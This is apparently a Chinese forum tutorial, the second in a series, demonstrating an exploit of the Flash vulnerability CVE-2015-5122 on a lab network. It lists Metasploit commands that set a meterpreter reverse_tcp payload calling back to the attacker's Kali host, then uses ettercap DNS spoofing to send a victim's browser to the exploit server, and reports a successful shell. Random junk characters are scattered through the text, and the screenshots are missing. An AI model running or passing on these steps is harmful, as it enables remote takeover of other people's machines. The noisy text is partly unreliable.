9 G$ n3 r' q$ U- R3 {" Q
二、cve2015-5122漏洞实例演示虚拟机 ( I: z3 `: n- M" }. l3 S) g3 R
3 |/ {! f( R5 h
( g6 B4 X1 X/ O* z; A, y, i 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ) K) u; S1 I/ }/ |
( R5 Q3 @# a6 ^# ^ o
! y) v0 m; U& Q r. A& F* X
search cve-2015-5122如图:
3 b; Z' p5 {$ p b
; J. A0 O) E: x2 }! G3 Y# ]! d4 o$ o1 i7 A3 c; y. w$ M( P2 k5 _
: K) ^* [6 D8 B
# M B- _0 J( f/ S2 A* ^3 L' i& |: Z! w3 N/ w, f5 I9 G
下面我们敲如下命令:
4 n6 R% y) E8 p' a1 [2 h% x
8 O! P1 W6 D( a2 i! o3 a1 V5 z* Z1 C* } {! \: x- E; x6 S( R
use exploit/multi/browser/adobe_flash_opaque_background_uaf 2 u; @4 ?, i5 a* J4 U
* x; n% O8 k3 a$ C0 Z! ^( x
' I* _$ u: f6 n1 K set PAYLOAD windows/meterpreter/reverse_tcp 3 X& `+ B: n% j) P
, F" ], v2 S' R# @7 G% W7 P
- g+ L# i o/ K; E7 {" R
set LHOST 192.168.0.109
9 ]$ _# [8 [8 p; w8 i& f8 ~/ t
3 `2 j# y) F) z& B
5 E) [$ K& `- o- H& M; k. z set URIPATH / /*根目录*/
7 P6 ?! {$ {4 Z. D+ S1 r2 `2 c( \
8 P4 K) H: X! A( N5 |4 a2 Z. L# z z+ W( z! y/ \0 l; B# F
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
5 k9 x" S7 G8 v
* \! B& \0 h. {, d r5 m. [5 P, U& |# i; `' P1 H
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 i9 u S9 _( W! b8 B6 d. K2 ]2 D
0 s6 U. V; H& A' D% X+ l/ n8 \1 @+ D! u) Z
然后show options如图: 8 m; y4 R* s5 ]% u
* b6 U- S0 k/ d% }% f k- J. X! L4 w
" E* q- s! ~5 Q* l( L
- P# i6 s: l/ q3 P8 U+ H
% Y3 V6 V8 t; O
. N: \6 c; T5 G+ E 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
$ v" ?3 d: `) S3 V$ @ ' ?8 I$ z4 u ]% l O9 A4 E* p) K
* m5 K, V3 h! N X/ ~6 k
# Z& l% ?5 r4 B2 y5 Z& h \; H 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
2 K5 U8 Y+ S) r/ [; ?: z G* X) v/ e* Z/ h+ I- A; g
6 b6 k0 [5 s+ b4 A' X
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
" B( B; |. Q/ w8 M & d+ q! r/ s! S x: ?
3 k3 V: _. Y8 K
1 Q9 L- l) U& i2 V1 S
3 w- W! l. t8 m g7 @- _! ~! t
. X7 A! ]! F9 v0 \4 P. W$ T
成功了,这时候我们断开ettercap,如图:
* z# L2 {3 e6 L$ @, R* X
# a0 {2 L0 _4 p& p6 c' A& N: l$ B" J5 ?" Z# o+ Q
& q& E6 Z/ {* f( Y
+ g) E- ?- S9 m3 _# g' T
) E) V9 k* a' n6 I6 _3 g Screenshot如图: 3 ~5 F: x8 ?/ W$ K j6 |# p# @
0 {5 h2 p. y! A2 b
% h- V$ M* Z2 t' i( W2 P$ z4 z7 |$ E
( m) ?$ [: P- f2 e9 G ( I4 |" Q* R8 f0 w7 I* b
* f$ T, Q' d8 G2 [
2 B$ @4 F' K( Z! A
|